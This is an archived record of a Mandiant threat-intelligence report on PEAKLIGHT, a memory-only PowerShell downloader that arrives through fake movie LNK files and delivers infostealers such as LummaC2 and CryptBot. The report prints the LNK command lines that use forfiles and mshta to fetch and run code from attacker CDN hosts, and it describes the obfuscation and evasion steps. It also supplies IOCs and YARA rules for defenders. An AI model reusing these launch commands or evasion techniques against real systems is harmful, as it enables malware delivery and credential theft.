{
	"id": "f7f9432e-c32d-4a1f-98a5-31e4281c2184",
	"created_at": "2026-04-06T00:10:17.623324Z",
	"updated_at": "2026-04-10T03:21:50.809041Z",
	"deleted_at": null,
	"sha1_hash": "f3be817749169c31ba0cf255f3b63328ec9d79c5",
	"title": "PEAKLIGHT: Decoding the Stealthy Memory-Only Malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3241531,
	"plain_text": "PEAKLIGHT: Decoding the Stealthy Memory-Only Malware\r\nBy Mandiant\r\nPublished: 2024-08-22 · Archived: 2026-04-05 12:47:07 UTC\r\nWritten by: Aaron Lee, Praveeth DSouza\r\nTL;DR\r\nMandiant identified a new memory-only dropper using a complex, multi-stage infection process. This memory-only dropper decrypts and executes a PowerShell-based downloader. This PowerShell-based downloader is being\r\ntracked as PEAKLIGHT.\r\nOverview\r\nMandiant Managed Defense identified a memory-only dropper and downloader delivering malware-as-a-service\r\ninfostealers. During our investigation, Mandiant observed the malware download payloads such as LUMMAC.V2\r\n(LUMMAC2), SHADOWLADDER, and CRYPTBOT. Mandiant identified the initial infection vector as a\r\nMicrosoft Shortcut File (LNK) that connects to a content delivery network (CDN) hosting an obfuscated memory-only JavaScript dropper. Analysis of the payload revealed that it executes a PowerShell downloader script on the\r\nhost. Mandiant named this final downloader PEAKLIGHT.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/\r\nPage 1 of 18\n\nFigure 1: Infection chain\r\nInfection Chain\r\nStage 1: Movie Lures; A Blast from the Past \r\nIn recent investigations, Mandiant identified victims downloading malicious ZIP files disguised as pirated movies.\r\nThese archives contained a malicious Microsoft Shortcut File (LNK) following the filename schema seen in\r\nFigure 2:\r\n* Video_mp4_1080p_x264.zip -\u003e The Movie (HD).lnk\r\n* Video_mp4_[1080p].zip -\u003e Full Movie 1080p HD.lnk\r\n* @!Movie_HD_1080p_mp4_@!.zip -\u003e Full Movie HD (1080p).lnk\r\n* mp4_Full_Video_HD_1080p@!.zip -\u003e Full Video (HD) mp4.lnk\r\nFigure 2: Initial infection\r\nDuring an associated investigation within a client environment, Mandiant identified anomalous outbound network\r\nactivity to the IP address 62.133.61[.]56. The XML page seen in Figure 3 was subsequently discovered at the URL\r\nhxxp://62.133.61[.]56/Downloads.\r\nOf particular interest was this snippet from the XML markup, seen in Figure 4.\r\n\u003cD:href\u003e/Downloads/Full%20Video%20HD%20%281080p%29.lnk\u003c/D:href\u003e\r\n \u003cD:propstat\u003e\r\n \u003cD:prop\u003e\r\n \u003cD:resourcetype\u003e\u003c/D:resourcetype\u003e\r\n \u003cD:displayname\u003eFull Video HD (1080p).lnk\u003c/D:displayname\u003e\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/\r\nPage 2 of 18\n\n\u003cD:getcontenttype\u003eapplication/octet-stream\u003c/D:getcontenttype\u003e\r\n \u003cD:getetag\u003e\"17d6b3e5205a12a0460\"\u003c/D:getetag\u003e\r\n \u003cD:getcontentlength\u003e1120\u003c/D:getcontentlength\u003e\r\n \u003cD:getlastmodified\u003eFri, 07 Jun 2024 11:01:44 GMT\u003c/D:getlastmodified\u003e\r\n \u003cD:supportedlock\u003e\r\nFigure 4: Forwarding mechanism\r\nBased on the contents of Figure 4, this code may have served as a redirect or forwarding mechanism for the URL\r\nhxxp://62.133.61[.]56/Downloads/Full Video HD (1080p).lnk (MD5: 62f20122a70c0f86a98ff14e84bcc999).\r\nMandiant subsequently acquired this file and determined it was a LNK file configured with a media file icon\r\n(Figure 5).\r\nFigure 5: LNK file configured with a media file icon\r\nLNK files are a common tactic used by threat actors to trick unsuspecting users into unknowingly executing\r\nmalware. These files can be disguised as legitimate documents or programs, making them effective for hiding in\r\nplain sight.\r\nAt this stage in the investigation, Mandiant identified different command variations within the parameters of the\r\nLNK file.\r\nVariation 1\r\nThe parameters portion of the LNK file was configured to leverage the legitimate Microsoft utility forfiles.exe to\r\nsearch for the file win.ini and execute a PowerShell script. Mandiant observed the execution of the following\r\ncommand (Figure 6):\r\nforfiles.exe /p C:\\Windows /m win.ini /c \"powershell .\r\nmshta https://nextomax.b-cdn[.]net/nexto\"\r\nFigure 6: Initial PowerShell script variation 1\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/\r\nPage 3 of 18\n\nThis command:\r\nUses the /p command switch for forfiles.exe to set the designated file search path to C:\\Windows.\r\nUses the /m command switch to look for files matching the name win.ini. Then, for each match (though on\r\ntypical Windows installations there will only be one):\r\nStarts powershell.exe with configurations to load a localized or dot-sourced script, which is\r\nsignified by the \".\" (in this case, the output generated by the rest of the command-line parameters).\r\nRetrieves a second-stage payload from the URL hxxps://nextomax.b-cdn[.]net/nexto.\r\nExecutes the retrieved payload via mshta.exe.\r\nAfter executing this LNK file, Windows Media Player was opened on the affected host, and a video of a\r\nprominent film studio's opening logo reel played automatically.\r\nThis video file was simply called video.mp4 (MD5: 91423dd4f34f759aaf82aa73fa202120) and presumably\r\nserved as a \"cover\" video to attempt to alleviate suspicions that the affected host had, in reality, been infected with\r\nmalware.\r\nVariation 2\r\nIn a different investigation, Mandiant observed the parameters portion of the LNK file initiated a PowerShell\r\ncommand that employed asterisks (*) as wildcards to launch mshta.exe to discreetly run malicious code retrieved\r\nfrom a remote server.\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"\r\n.(gp -pa 'HKLM:\\SOF*\\Clas*\\Applications\\msh*e').\r\n('PSChildName')hxxps://potexo.b-cdn[.]net/potexo\r\nFigure 7: Initial PowerShell script variation 2\r\nThis command:\r\nRuns a script signified by the dot sourcing operator \".\".\r\nUses the Get-ItemProperty (gp) to point to the Mshta registry hive and psChildName to specify the\r\nobject, mshta.exe.\r\nRetrieves the second-stage payload from the URL hxxps://potexo.b-cdn[.]net/potexo and executes via\r\nmshta.exe.\r\nThe attackers employed the following evasion techniques to further cover their tracks:\r\nSystem Binary Proxy Execution: By using mshta.exe, the attackers execute malicious code directly from\r\na remote server, bypassing application control solutions and browser security settings. \r\nhttps://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/\r\nPage 4 of 18\n\nContent Delivery Network Abuse: The attackers took advantage of a reputable content delivery network\r\n(Bunny CDN) to host their malicious payloads. This abuse of trust associated with CDNs allowed them to\r\ncircumvent security filters that might not scrutinize traffic from known, trusted sources.\r\nBoth variations utilize MITRE ATT\u0026CK® Technique T1218.005: System Binary Proxy Execution: Mshta.\r\nStage 2: JavaScript Dropper\r\nFigure 8 shows analysis of the HTML file cached on the CDN contained an obfuscated memory-only JavaScript\r\ndropper.\r\nFigure 8: JavaScript dropper layer 1\r\nThe script begins by assigning decimal-encoded ASCII characters to randomly named variables. The\r\nString.fromCharCode() function is then used to convert the decimal-encoded characters back into their\r\ncorresponding ASCII characters to decode the JavaScript dropper embedded within the script.\r\nMandiant identified an embedded payload after decoding the JavaScript dropper, seen in Figure 9.\r\nFigure 9: JavaScript dropper layer 2\r\nThe script in Figure 9 carries out the following actions:\r\n1. Decoding Function (wAJ)\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/\r\nPage 5 of 18\n\nThe function receives an array of numbers, decodes each by subtracting 619, and then converts the result to\r\nits corresponding character using String.fromCharCode(). These characters are then combined to produce\r\nthe final, decoded string, which is returned by the function.\r\n2. Payload (KbX, YmD)\r\nThe variables KbX and YmD contain obfuscated data, which is decoded by the wAJ function.\r\n3. ActiveXObject\r\nThe script employs a decoded variable YmD, which resolves to Wscript.shell, to create a new ActiveX\r\nobject. This object grants the script system-level privileges to execute commands.\r\n4. IMD.Run\r\nExecutes the decoded KbX command.\r\nParameters:\r\n0: This parameter instructs the command to run in a hidden window, keeping its actions concealed\r\nfrom the user.\r\ntrue: This parameter ensures the script waits for the command to complete its execution before\r\nmoving on to any subsequent steps.\r\nThe payload (KbX) was abbreviated to maintain a concise presentation.\r\nNote: Mandiant used this CyberChef recipe to successfully decode the obfuscated JavaScript dropper.\r\nVariation 1: Hex-Encoded Payload\r\nFigure 10: PowerShell hex-encoded payload\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/\r\nPage 6 of 18\n\nThe first command conceals its malicious payload within a string of hexadecimal characters. The execution\r\nprocess adheres to the following sequence:\r\nStealthy PowerShell Launch: The command initiates PowerShell in a hidden window ( -w 1 ), bypasses\r\nexecution restrictions ( -ep Unrestricted ), and skips loading user profiles ( -nop ), ensuring covert\r\noperations.\r\nHex to Byte Conversion: A custom function ( ffQiHkvB ) is defined to transform the hexadecimal string\r\ninto a byte array, a standard format for storing data.\r\nDecryption: The script creates an Advanced Encryption Standard (CBC mode) decryptor using a hex key.\r\nThe byte array is decrypted, revealing the actual PowerShell code.\r\nExecution: Finally, the decrypted PowerShell code is executed.\r\nNote: Mandiant decoded the payload using a custom CyberChef recipe.\r\nVariation 2: Base64-Encoded Payload\r\nFigure 11: PowerShell Base64-encoded payload\r\nThe second command follows a similar structure but with key differences: the malicious payload is encoded using\r\nBase64 instead of hexadecimal and is executed through a memory stream.\r\nStealth and Configuration: The initial steps to launch PowerShell in a hidden, unrestricted mode are the\r\nsame as in Variation 1.\r\nBase64 Decoding: Instead of a custom function, this variant directly uses PowerShell's built-in\r\nFromBase64String method to decode the payload. \r\nDecryption, Decompression, and Execution: The payload is decrypted using AES (ECB mode) with a\r\nBase64-encoded key. After decryption, the payload is decompressed into memory using GZIP, revealing\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/\r\nPage 7 of 18\n\nthe PowerShell code, which is subsequently executed.\r\nStage 3: PEAKLIGHT; The PowerShell Downloader\r\nPEAKLIGHT is an obfuscated PowerShell-based downloader that checks for the presence of hard-coded\r\nfilenames and downloads files from a remote CDN if the files are not present. \r\nDuring our analysis, Mandiant identified the following key differences across the variations of the PEAKLIGHT\r\nscript:\r\nTarget Directory: \r\nVariation 1 downloads files to $env:AppData.\r\nVariation 2 downloads files to $env:ProgramData.\r\nExecution Logic: \r\nVariation 1 executes the first alphabetically sorted file in the archive. \r\nVariation 2 executes the first file found in the archive.\r\nFile Name: \r\nVariation 1 downloads files as L1.zip and L2.zip.\r\nVariation 2 downloads files as K1.zip and K2.zip. \r\nAdditional Actions: \r\nVariation 1 also downloads an image (video.mp4) and makes a request to a remote server. \r\nVariation 2 does not download an image file.\r\nNote: Mandiant decoded the obfuscated payload using a custom CyberChef recipe.\r\nVariation 1\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/\r\nPage 8 of 18\n\nFigure 12: PEAKLIGHT variation 1\r\nThis PEAKLIGHT downloader is designed to execute the following tasks:\r\n1. znY: Writes data to a file.\r\n2. nbF: Extracts a ZIP archive and runs the first executable file inside.\r\n3. aXR: Downloads data from an obfuscated URL.\r\n4. jkg: Deobfuscates a string.\r\nMain Function (AsD)\r\nVideo Playback or Download: It checks if video.mp4 exists in the AppData folder. If it exists, it plays\r\nthe video. If not, it downloads the video from a specified URL, saves it as video.mp4 in the AppData\r\nfolder, and then plays it.\r\nImage Download: It downloads an image from https://forikabrof[.]click/flkhfaiouwrqkhfasdrhfsa.png\r\nusing Invoke-WebRequest.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/\r\nPage 9 of 18\n\nZIP File Handling:\r\nIt checks if L1.zip exists in the AppData folder.\r\nIf it exists, it extracts its contents to the AppData folder and runs the first executable file found\r\nwithin the ZIP.\r\nIf not, it downloads L1.zip from a specified URL, saves it in the AppData folder, extracts its\r\ncontents, and runs the first executable.\r\nIt repeats the same process for L2.zip.\r\nAnalysis of the PEAKLIGHT downloader outlined in Figure 12 revealed the following URIs:\r\nhttps://nextomax.b-cdn[.]net/video.mp4\r\nhttps://nextomax.b-cdn[.]net/L1.zip\r\nhttps://nextomax.b-cdn[.]net/L2.zip\r\nhttps://forikabrof[.]click/flkhfaiouwrqkhfasdrhfsa.png \r\nVariation 2\r\nFigure 13: PEAKLIGHT variation 2\r\nThis PEAKLIGHT downloader is designed to deliver and execute additional payloads on a compromised system.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/\r\nPage 10 of 18\n\nThe functions:\r\n1. qXF($EGa, $aQU): The purpose of this function is to write data to a file.\r\n2. Irl($EGa): Extracts a ZIP archive and runs an executable from it.\r\n3. OBs($BYu):  Downloads data from a URL.\r\n4. Fzl($XFW): Deobfuscates an array of numbers into a string (likely a URL).\r\nMain Execution (bSo function):\r\nDefines two ZIP file paths: K1.zip and K2.zip within the ProgramData directory.\r\nFor each of these ZIP files, it checks if they already exist.\r\nIf the file exists, it simply unzips it using the Irl function.\r\nIf the file is missing, it first uses the function Fzl to decode an obfuscated web address, then downloads the\r\nZIP file from that address using the function OBs. Finally, it unzips the downloaded file using the function\r\nIrl.\r\nAnalysis of the PEAKLIGHT downloader outlined in Figure 13 revealed the following URIs:\r\nhttps://potexo.b-cdn[.]net/K1.zip\r\nhttps://potexo.b-cdn[.]net/K2.zip\r\nAdditionally, Mandiant identified other PEAKLIGHT downloader samples connecting to various subdomains\r\nhosted on Bunny CDN. These samples will be discussed in more detail in the subsequent stage of analysis.\r\nStage 4: The Final Payload\r\nVariation 1: L1.zip and L2.zip\r\nHaving explored the initial stages of the PEAKLIGHT downloader's operation, our focus now shifts to the\r\npayload it delivers. As detailed in Variation 1 of Stage 3, this downloader was observed downloading three\r\nspecific files: L1.zip, L2.zip, and video.mp4. Mandiant successfully acquired and extracted the contents of the\r\nfiles, as seen in Table 1.\r\nDownload Extracted Content\r\nFilename: L2.zip\r\nHash: 307f40ebc6d8a207455c96d34759f1f3\r\nType: Archive\r\nFilename: Setup.exe\r\nHash: d8e21ac76b228ec144217d1e85df2693\r\nType: Win32 EXE\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/\r\nPage 11 of 18\n\nFilename: L1.zip\r\nHash: a6c4d2072961e9a8c98712c46be588f8\r\nType: Archive\r\nFilename: LiteSkinUtils.dll\r\nHash: 059d94e8944eca4056e92d60f7044f14\r\nType: Win32 DLL\r\nFilename: Bentonite.cfg\r\nHash: e7c43dc3ec4360374043b872f934ec9e\r\nType: PNG\r\nFilename: Video.mp4\r\nHash: 91423dd4f34f759aaf82aa73fa202120\r\nType: Video\r\n \r\nTable 1: Variant 1 downloaded files and extracted archive content\r\n1. L2.zip contained the following:\r\nSetup.exe: This executable is a variant of the Cryptbot infostealer. Our analysis uncovered the\r\nfollowing embedded URLs:\r\n1. https://brewdogebar[.]com/code.vue\r\n2. http://gceight8vt[.]top/upload.php\r\n2. L1.zip contained the following:\r\nbentonite.cfg: This file contains malware configurations that are linked to the SHADOWLADDER\r\nmalware family.\r\nLiteSkinUtils.dll: It is a malicious component used by SHADOWLADDER malware to facilitate\r\nthe execution of its second-stage payload through dynamic-link library (DLL) side-loading.\r\n3. Video.mp4\r\nThis file appears to be a legitimate movie trailer, likely used as a decoy to deceive the victim into\r\nbelieving that the downloaded files are safe.\r\nVariation 2: K1.zip and K2.zip\r\nThe second variant of the PEAKLIGHT downloader, discussed in Variation 2 of Stage 3, was observed\r\ndownloading two archives: K1.zip and K2.zip.\r\nDownload Extracted Content\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/\r\nPage 12 of 18\n\nFilename: K1.zip\r\nHash: b6b8164feca728db02e6b636162a2960\r\nType: Archive\r\nFilename: toughie.txt\r\nHash:\r\ndfdc331e575dae6660d6ed3c03d214bd\r\nType: data\r\nFilename: Aaaa.exe\r\nHash:\r\nb15bac961f62448c872e1dc6d3931016\r\nType: Win32 EXE\r\nFilename: WCLDll.dll\r\nHash:\r\n47eee41b822d953c47434377006e01fe\r\nType: Win32 DLL\r\nFilename:\r\nC:\\Users\\user\\AppData\\Local\\Temp\\erefgojgbu\r\nHash: d6ea5dcdb2f88a65399f87809f43f83c\r\nType: Win32 EXE\r\n \r\nFilename: K2.zip\r\nHash: 236c709bbcb92aa30b7e67705ef7f55a\r\nType: Archive\r\nFilename: Jfts.exe\r\nHash:\r\nb15bac961f62448c872e1dc6d3931016\r\nType: Win32 EXE\r\nTable 2: Variant 2 downloaded files and extracted archive content\r\n1. K1.zip contained the following:\r\ntoughie.txt: This file contained configurations related to the SHADOWLADDER malware.\r\naaaa.exe \u0026 WCLDll.dll: These binaries are DLL files that SHADOWLADDER patches to\r\nleverage their HTTP download functionality.\r\n2. K2.zip contained the following:\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/\r\nPage 13 of 18\n\nJfts.exe: This file is a renamed copy of the previously mentioned aaaa.exe.\r\nUpon execution, Jfts.exe loads the malicious WCLDll.dll from K1.zip. This DLL then leverages the \"More\r\nUtility\" (more.com) to stealthily drop two additional files:\r\n\\AppData\\Local\\Temp\\Hofla.au3 (MD5: c56b5f0201a3b3de53e561fe76912bfd): Identified as an\r\nAutoIt3.exe binary.\r\n\\AppData\\Local\\Temp\\erefgojgbu (MD5: d6ea5dcdb2f88a65399f87809f43f83c): Further analysis of this\r\nfiles confirmed their association with the CRYPTBOT.AUTOIT malware.\r\nVariation 3: Additional PEAKLIGHT Variant\r\nFurther analysis has identified an additional PEAKLIGHT downloader variant employing distinct tactics. This\r\nvariant retrieves its payload,the archives K1.zip and K2.zip, from the domain matodown.b-cdn[.]net. A detailed\r\nbreakdown of the contents within these archives is presented in Table 3.\r\nDownload Extracted Content\r\nFilename: K1.zip\r\nHash: bb9641e3035ae8c0ab6117ecc82b65a1\r\nType: Archive\r\nFilename: cymophane.doc\r\nHash: f98e0d9599d40ed032ff16de242987ca\r\nType: ISO\r\nFilename: WebView2Loader.dll\r\nHash: 58c4ba9385139785e9700898cb097538\r\nType: Win32 DLL\r\nFilename: K2.zip\r\nHash: d7aff07e7cd20a5419f2411f6330f530\r\nType: Archive\r\nFilename: hgjke.exe\r\nHash: c047ae13fc1e25bc494b17ca10aa179e\r\nType: Win32 EXE\r\nFilename: AppData\\Local\\Temp\\oqnhustu\r\nHash: 43939986a671821203bf9b6ba52a51b4\r\nType: Win32 EXE\r\n \r\nhttps://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/\r\nPage 14 of 18\n\nTable 3: Variant 3 downloaded files and extracted archive content\r\n1. K1.zip contained the following:\r\ncymophane.doc: This file contained configurations related to the SHADOWLADDER malware.\r\nWebView2Loader.dll: This malicious DLL was observed to be dropped by the LummaC.V2\r\ninfostealer.\r\n2. K2.zip contained the following:\r\nHgjke.exe: Identified as a renamed copy of the legitimate \"JRiver Web Application\" executable.\r\nDuring dynamic analysis, hgjke.exe was observed loading the malicious WebView2Loader.dll.\r\nMandiant observed hgjke.exe utilize the comp.exe utility to drop two additional files:\r\nAppData\\Local\\Temp\\Ufa.au3 (MD5: c56b5f0201a3b3de53e561fe76912bfd): Identified as\r\nan AutoIt3 binary.\r\nAppData\\Local\\Temp\\oqnhustu (MD5: 43939986a671821203bf9b6ba52a51b4): Further\r\nanalysis confirmed this file to be consistent with the LummaC.V2 payload.\r\nConclusion\r\nPEAKLIGHT is an obfuscated PowerShell-based downloader that is part of a multi-stage execution chain that\r\nchecks for the presence of ZIP archives in hard-coded file paths. If the archives do not exist, the downloader will\r\nreach out to a CDN site and download the remotely hosted archive file and save it to disk. PEAKLIGHT was\r\nobserved downloading payloads such as LUMMAC.V2, SHADOWADDER, and CRYPTBOT. The malware\r\ndevelopers used several different obfuscation and evasion techniques, including system binary proxy execution\r\nand CDN abuse. Mandiant identified different variations of the PEAKLIGHT downloader, each with its own\r\nunique characteristics.\r\nWe encourage security researchers to remain vigilant and share any insights or similar malware samples they\r\nencounter. By working together and fostering open communication within the cybersecurity community, we can\r\nbetter understand the evolving threat landscape and strengthen our collective defenses against future attacks.\r\nProtect and scan your environment against the indicators of compromise and YARA rules in the following section.\r\nIf you suspect that your environment may have been compromised, contact our Incident Response team for\r\nassistance.\r\nAcknowledgements\r\nWe would like to thank Adrian McCabe for assistance with LNK research and subject matter expertise, Raymond\r\nLeong for the initial analysis of malware stages and payloads, and the Mandiant Research Team for their valuable\r\nfeedback.\r\nDetections\r\nYARA Rules\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/\r\nPage 15 of 18\n\nrule M_AES_Encrypted_payload {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule is desgined to detect on events that\r\nexhibits indicators of utilizing AES encryption for payload obfuscation.\"\r\n target_entity = \"Process\"\r\n strings:\r\n $a = /(\\$\\w+\\.Key(\\s|)=((\\s|)(\\w+|));|\\$\\w+\\.Key(\\s|)=(\\s|)\\w+\\('\\w+'\\);)/\r\n $b = /\\$\\w+\\.IV/\r\n $c = /System\\.Security\\.Cryptography\\.(AesManaged|Aes)/\r\n condition:\r\n all of them\r\n}\r\nrule M_Downloader_PEAKLIGHT_1 {\r\n meta:\r\n mandiant_rule_id = \"e0abae27-0816-446f-9475-1987ccbb1bc0\"\r\n author = \"Mandiant\"\r\n category = \"Malware\"\r\n description = \"This rule is designed to detect on events related to peaklight.\r\nPEAKLIGHT is an obfuscated PowerShell-based downloader which checks for\r\nthe presence of hard-coded filenames and downloads files from a remote CDN\r\nif the files are not present.\"\r\n family = \"Peaklight\"\r\n platform = \"Windows\"\r\n strings:\r\n $str1 = /function\\s{1,16}\\w{1,32}\\(\\$\\w{1,32},\\s{1,4}\\$\\w{1,32}\\)\\\r\n{\\[IO\\.File\\]::WriteAllBytes\\(\\$\\w{1,32},\\s{1,4}\\$\\w{1,32}\\)\\}/ ascii wide\r\n $str2 = /Expand-Archive\\s{1,16}-Path\\s{1,16}\\$\\w{1,32}\\\r\ns{1,16}-DestinationPath/ ascii wide\r\n $str3 = /\\(\\w{1,32}\\s{1,4}@\\((\\d{3,6},){3,12}/ ascii wide\r\n $str4 = \".DownloadData(\" ascii wide\r\n $str5 = \"[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12\" ascii wide\r\n $str6 = /\\.EndsWith\\((([\"']\\.zip[\"'])|(\\(\\w{1,32}\\s{1,16}@\\((\\d{3,6},){3}\\d{3,6}\\)\\)))/ ascii wide\r\n $str7 = \"Add -Type -Assembly System.IO.Compression.FileSystem\" ascii wide\r\n$str8 = \"[IO.Compression.ZipFile]::OpenRead\"\r\n condition:\r\n 4 of them and filesize \u003c 10KB\r\n}\r\nIndicators of Compromise (IOCs)\r\nNetwork-Based IOCs\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/\r\nPage 16 of 18\n\nPEAKLIGHT NBIs:\r\nhxxps://fatodex.b-cdn[.]net/fatodex\r\nhxxps://matodown.b-cdn[.]net/matodown\r\nhxxps://potexo.b-cdn[.]net/potexo\r\nLUMMAC.V2 C2s:\r\nrelaxtionflouwerwi[.]shop\r\ndeprivedrinkyfaiir[.]shop\r\ndetailbaconroollyws[.]shop\r\nmesstimetabledkolvk[.]shop\r\nconsiderrycurrentyws[.]shop\r\nunderstanndtytonyguw[.]shop\r\npatternapplauderw[.]shop\r\nhorsedwollfedrwos[.]shop\r\ntropicalironexpressiw[.]shop\r\nCRYPTBOT C2s:\r\nhxxp://gceight8vt[.]top/upload.php\r\nhxxps://brewdogebar[.]com/code.vue\r\nSHADOWLADDER:\r\nhxxp://62.133.61[.]56/Downloads/Full%20Video%20HD%20(1080p).lnk\r\nhxxps://fatodex.b-cdn[.]net/K1.zip\r\nhxxps://fatodex.b-cdn[.]net/K2.zip\r\nhxxps://forikabrof[.]click/flkhfaiouwrqkhfasdrhfsa.png\r\nhxxps://matodown.b-cdn[.]net/K1.zip\r\nhxxps://matodown.b-cdn[.]net/K2.zip\r\nhxxps://nextomax.b-cdn[.]net/L1.zip\r\nhxxps://nextomax.b-cdn[.]net/L2.zip\r\nhxxps://potexo.b-cdn[.]net/K1.zip\r\nhxxps://potexo.b-cdn[.]net/K2.zip\r\nHost-Based IOCs\r\nCRYPTBOT:\r\nerefgojgbu (MD5: d6ea5dcdb2f88a65399f87809f43f83c)\r\nL2.zip (MD5: 307f40ebc6d8a207455c96d34759f1f3)\r\nSеtup.exe (MD5: d8e21ac76b228ec144217d1e85df2693)\r\nLUMMAC.V2:\r\noqnhustu (MD5: 43939986a671821203bf9b6ba52a51b4)\r\nWebView2Loader.dll (MD5: 58c4ba9385139785e9700898cb097538)\r\nPEAKLIGHT:\r\nDownloader (MD5: 95361f5f264e58d6ca4538e7b436ab67)\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/\r\nPage 17 of 18\n\nDownloader (MD5: b716a1d24c05c6adee11ca7388b728d3)\r\nSHADOWLADDER:\r\nAaaa.exe (MD5: b15bac961f62448c872e1dc6d3931016)\r\nbentonite.cfg (MD5: e7c43dc3ec4360374043b872f934ec9e)\r\ncymophane.doc (MD5: f98e0d9599d40ed032ff16de242987ca)\r\nK1.zip (MD5: b6b8164feca728db02e6b636162a2960)\r\nK1.zip (MD5: bb9641e3035ae8c0ab6117ecc82b65a1)\r\nK2.zip (MD5: 236c709bbcb92aa30b7e67705ef7f55a)\r\nK2.zip (MD5: d7aff07e7cd20a5419f2411f6330f530)\r\nL1.zip (MD5: a6c4d2072961e9a8c98712c46be588f8)\r\nLiteSkinUtils.dll (MD5: 059d94e8944eca4056e92d60f7044f14)\r\ntoughie.txt (MD5: dfdc331e575dae6660d6ed3c03d214bd)\r\nWCLDll.dll (MD5: 47eee41b822d953c47434377006e01fe)\r\nPosted in\r\nThreat Intelligence\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/\r\nPage 18 of 18",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/"
	],
	"report_names": [
		"peaklight-decoding-stealthy-memory-only-malware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434217,
	"ts_updated_at": 1775791310,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f3be817749169c31ba0cf255f3b63328ec9d79c5.pdf",
		"text": "https://archive.orkl.eu/f3be817749169c31ba0cf255f3b63328ec9d79c5.txt",
		"img": "https://archive.orkl.eu/f3be817749169c31ba0cf255f3b63328ec9d79c5.jpg"
	}
}